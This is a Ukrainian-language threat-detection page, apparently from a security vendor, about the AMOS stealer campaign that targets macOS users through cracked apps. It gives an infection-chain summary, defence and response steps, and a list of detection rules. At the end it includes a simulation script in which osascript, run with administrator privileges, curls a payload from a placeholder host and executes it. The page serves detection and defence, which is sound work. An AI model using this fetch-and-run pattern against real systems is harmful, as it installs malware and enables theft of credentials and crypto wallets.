AMOS-крадій націлено на macOS через «зламані» додатки
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт описує кампанію з розповсюдження Atomic macOS Stealer (AMOS), завуальованого під зламані додатки або ж шляхом інструкцій користувачам із запуску команд терміналу копіювання-вставки. Після виконання, шкідливе програмне забезпечення збирає широкий набір конфіденційних даних, включно з обліковими даними, інформацією про браузер, криптовалютними гаманцями, файлами додатків для обміну повідомленнями, профілями VPN та особистими документами, які потім передає викрадений вміст через HTTP або HTTPS. Щоб уникнути статичного виявлення, оператори змінюють домени та URL-адреси протягом всієї кампанії. Ці дії спрямовані на користувачів macOS, особливо тих, хто шукає неофіційні або піратські програми.
Розслідування
Телеметрія Trend Vision One використовувалась для реконструкції повного ланцюга зараження, починаючи з завантажень зламаних додатків з haxmac.cc, потім перенаправлення через проміжні домени, виконання шкідливих shell-скриптів, створення демонів запуску для збереження, підготовка даних у /tmp, стиснення в ZIP-архіви та ексфільтрація на змінювані домени, контрольовані нападниками. Дослідники зафіксували відповідні командні рядки, шляхи файлів та поведінкові індикатори, пов’язані з кожним етапом компрометації.
Захист
Організації повинні навчати користувачів про ризики використання зламаного програмного забезпечення та команд копіювання-вставки в терміналі, забезпечувати дотримання контролю Gatekeeper та нотації, а також обмежити виконання непотрібних скриптів у системах macOS. Захисникам також слід моніторити підозрілу активність curl and osascript і блокувати доступ до відомих шкідливих доменів та IP-адрес. Виявлення на кінцевих точках має фокусуватися на несанкціонованому створенні демонів запуску, прихованому розміщенні файлів та незвичайній поведінці зі збору чи ексфільтрації файлів.
Відповідь
Якщо виявлено активність AMOS, ізолюйте уражену кінцеву точку, зупиніть шкідливі процеси, видаліть приховані файли, такі як .helper, .agentі com.finder.helper.plistта видаліть будь-які підготовлені дані для ексфільтрації. Скомпрометовані облікові дані повинні бути відкликані, а судово-медичний аналіз слід провести над будь-якими відновленими архівами. Виявлена шкідлива інфраструктура повинна бути заблокована, а вміст виявлення оновлено для моніторингу виявлених шаблонів команд.
Потік Атаки
Виявлення
Підозріле Використання Ditto для Архівування та Ексфільтрації Файлів на macOS (через process_creation)
Переглянути
Можливе Багатофайлове Створення у TMP Директорії для Ексфільтрації (через file_event)
Переглянути
Atomic MacOS Stealer – Діяльність FileGrabber
Переглянути
Можливе Копіювання Даних для Входу Chrome у TMP Директорію (через process_creation)
Переглянути
IOCs (HashSha1) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки
Переглянути
IOCs (SourceIP) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки
Переглянути
IOCs (DestinationIP) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки
Переглянути
Виявлення Виконання AMOS Stealer через Команди Терминалу на macOS [Linux Створення Процесів]
Переглянути
Виявлення Виконання AMOS Stealer через AppleScript та Curl [Linux Створення Процесів]
Переглянути
Виконання Симуляцій
Передумова: Перевірка Телеметрії та Базової лінії повинна бути пройдена.
Основи: Цей розділ детально описує конкретне виконання техніки противника (TTP), призначене для спрацювання правила виявлення. Команди та наратив ПОВИННІ безпосередньо відбивати виявлені TTP та прагнути створити точну телеметрію, що очікується за логікою виявлення. Абстрактні або нерелевантні приклади приведуть до невірної діагностики.
-
Опис атаки та команди:
Противник отримав фішингову приманку, яка доставляє короткий AppleScript масив. Сценарій використовуєosascriptдля виконання команди shell (sh -c), яка викликаєcurlдля завантаження бінарного файлу AMOS stealer з серверу C2, зберігає його в папці користувача~/Library/Application Support/та потім виконують його з підвищеними привілеями. Використанняosascript(підписаний бінарний файл Apple) маскує активність як легітимну автоматизацію, аcurlзабезпечує тиху мережеву завантаження. -
Скрипт регресійного тесту:
# amos_stealer_simulation.sh # Симуляція виконання AMOS stealer на macOS з використанням osascript + curl # 1. Визначити шкідливий URL (використовуйте безпечний заповнювач для безпеки) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. AppleScript, що виконує команду shell для завантаження та виконання масиву APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. Виконати AppleScript через osascript echo "$APPLESCRIPT" | osascript # 4. Коротка зупинка, щоб дозволити масиву запуститися sleep 5 -
Команди очищення:
# cleanup_amos_simulation.sh # Видалити артефакти, створені в результаті симуляції # Видалити завантажений масив rm -f /tmp/payload.sh # Відкликати тимчасові процеси з підвищенням привілеїв (якщо вони ще виконуються) pkill -f "/tmp/payload.sh" || true # Опціонально, очистити історію виконання AppleScript # (macOS не зберігає постійну історію для osascript) echo "Очищення завершено."